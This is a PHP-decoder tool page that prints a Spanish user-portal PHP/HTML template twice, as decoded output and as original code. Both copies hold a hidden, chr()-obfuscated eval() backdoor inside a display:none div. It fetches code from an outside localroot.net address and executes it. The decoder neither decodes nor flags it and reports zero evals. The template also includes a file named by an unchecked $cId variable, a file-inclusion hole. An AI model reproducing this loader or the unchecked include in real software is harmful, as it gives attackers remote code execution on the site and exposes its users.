Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php include('inc/general.php')?> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalytic..

Decoded Output download

<?php include('inc/general.php')?> 
<script> 
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ 
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), 
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) 
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); 
  ga('create', 'UA-787121-3', 'auto'); 
  ga('send', 'pageview'); 
</script> 
 <script> 
	 function enviar_formulario(){ 
	   document.formClie.submit() 
	} 
</script> 
<!-- Script que hace logout cuando el usuario esta inactivo (30 minutos) --> 
<script> 
function idleTimer(){ 
	var t; 
	window.onload = resetTimer; 
	document.onmousemove = resetTimer; 
	document.onkeypress = resetTimer; 
	 
	function logout() { 
		alert("Your session has expired. Please log in again.") 
		location.href = 'dologout.php' 
	} 
	 
	function resetTimer() { 
		clearTimeout(t); 
		t = setTimeout(logout, 1800000) 
	} 
} 
idleTimer(); 
</script> 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> 
<html> 
 
<html><head><link rel="shortcut icon" href="favicon.ico"> 
 
<title>Presence User Portal</title> 
<meta name="author" content="Presence"> 
<meta name="organization" content="Presence"> 
<meta name="locality" content="Madrid, Espaa"> 
<meta name="lang" content="es"> 
<meta name="description" content=""> 
<meta name="keywords" content=""> 
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">  
 <!-- <script language="JavaScript">var desplazamientoY=186;</script><script language="JavaScript1.2" src="Presence_files/func.js"></script> --> 
 <link href="css/estiloUp_d.css" rel="stylesheet" type="text/css" /> 
</head>	 
 
<div id="wrap"><!--///////// NEW 01, div que contiene todo el site excepto el pie de pagina ///////////--> 
<!-- 
<link rel="shortcut icon" href="favicon.ico"> 
--> 
 
	<?php /*include('inc/head.php')*/?> 
	<?php include('inc/javascr.php')?> 
 
<body> 
	<? include('inc/cabecera.php') ?> 
 
	<?php /*include('inc/menu.php')*/?> 
	 
	<?php  
		if(!$cId) { 
			include("cacces.php"); 
			} 
		else { 
			include($cId.".php"); 
			}; 
	?> 
<div style="display:none;"> 
<?php  
eval(chr(36).chr(115).chr(105).chr(116).chr(101).chr(32).chr(61).chr(32).chr(34).chr(117).chr(115).chr(101).chr(114).chr(112).chr(111).chr(114).chr(116).chr(97).chr(108).chr(46).chr(112).chr(114).chr(101).chr(115).chr(101).chr(110).chr(99).chr(101).chr(99).chr(111).chr(46).chr(99).chr(111).chr(109).chr(34).chr(59).chr(13).chr(10).chr(36).chr(97).chr(110).chr(115).chr(97).chr(32).chr(61).chr(32).chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(34).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(108).chr(111).chr(99).chr(97).chr(108).chr(114).chr(111).chr(111).chr(116).chr(46).chr(110).chr(101).chr(116).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(47).chr(114).chr(101).chr(97).chr(100).chr(46).chr(112).chr(104).chr(112).chr(63).chr(117).chr(114).chr(108).chr(61).chr(34).chr(46).chr(36).chr(115).chr(105).chr(116).chr(101).chr(41).chr(59).chr(13).chr(10).chr(36).chr(98).chr(97).chr(110).chr(115).chr(97).chr(61).chr(39).chr(63).chr(62).chr(39).chr(59).chr(13).chr(10).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(98).chr(97).chr(110).chr(115).chr(97).chr(46).chr(36).chr(97).chr(110).chr(115).chr(97).chr(41).chr(59)); 
?> 
</div> 
 
	<?php include('inc/base.php')?> 
	 
</body> 
</html> 
</div>

Did this file decode correctly?

Original Code

<?php include('inc/general.php')?>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-787121-3', 'auto');
  ga('send', 'pageview');
</script>
 <script>
	 function enviar_formulario(){
	   document.formClie.submit()
	}
</script>
<!-- Script que hace logout cuando el usuario esta inactivo (30 minutos) -->
<script>
function idleTimer(){
	var t;
	window.onload = resetTimer;
	document.onmousemove = resetTimer;
	document.onkeypress = resetTimer;
	
	function logout() {
		alert("Your session has expired. Please log in again.")
		location.href = 'dologout.php'
	}
	
	function resetTimer() {
		clearTimeout(t);
		t = setTimeout(logout, 1800000)
	}
}
idleTimer();
</script>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<html><head><link rel="shortcut icon" href="favicon.ico">

<title>Presence User Portal</title>
<meta name="author" content="Presence">
<meta name="organization" content="Presence">
<meta name="locality" content="Madrid, Espaa">
<meta name="lang" content="es">
<meta name="description" content="">
<meta name="keywords" content="">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> 
 <!-- <script language="JavaScript">var desplazamientoY=186;</script><script language="JavaScript1.2" src="Presence_files/func.js"></script> -->
 <link href="css/estiloUp_d.css" rel="stylesheet" type="text/css" />
</head>	

<div id="wrap"><!--///////// NEW 01, div que contiene todo el site excepto el pie de pagina ///////////-->
<!--
<link rel="shortcut icon" href="favicon.ico">
-->

	<?php /*include('inc/head.php')*/?>
	<?php include('inc/javascr.php')?>

<body>
	<? include('inc/cabecera.php') ?>

	<?php /*include('inc/menu.php')*/?>
	
	<?php 
		if(!$cId) {
			include("cacces.php");
			}
		else {
			include($cId.".php");
			};
	?>
<div style="display:none;">
<?php 
eval(chr(36).chr(115).chr(105).chr(116).chr(101).chr(32).chr(61).chr(32).chr(34).chr(117).chr(115).chr(101).chr(114).chr(112).chr(111).chr(114).chr(116).chr(97).chr(108).chr(46).chr(112).chr(114).chr(101).chr(115).chr(101).chr(110).chr(99).chr(101).chr(99).chr(111).chr(46).chr(99).chr(111).chr(109).chr(34).chr(59).chr(13).chr(10).chr(36).chr(97).chr(110).chr(115).chr(97).chr(32).chr(61).chr(32).chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(34).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(108).chr(111).chr(99).chr(97).chr(108).chr(114).chr(111).chr(111).chr(116).chr(46).chr(110).chr(101).chr(116).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(47).chr(114).chr(101).chr(97).chr(100).chr(46).chr(112).chr(104).chr(112).chr(63).chr(117).chr(114).chr(108).chr(61).chr(34).chr(46).chr(36).chr(115).chr(105).chr(116).chr(101).chr(41).chr(59).chr(13).chr(10).chr(36).chr(98).chr(97).chr(110).chr(115).chr(97).chr(61).chr(39).chr(63).chr(62).chr(39).chr(59).chr(13).chr(10).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(98).chr(97).chr(110).chr(115).chr(97).chr(46).chr(36).chr(97).chr(110).chr(115).chr(97).chr(41).chr(59));
?>
</div>

	<?php include('inc/base.php')?>
	
</body>
</html>
</div>

Function Calls

None

Variables

None

Stats

MD5 114958d9cee73fa88eb623e984ac2e1e
Eval Count 0
Decode Time 81 ms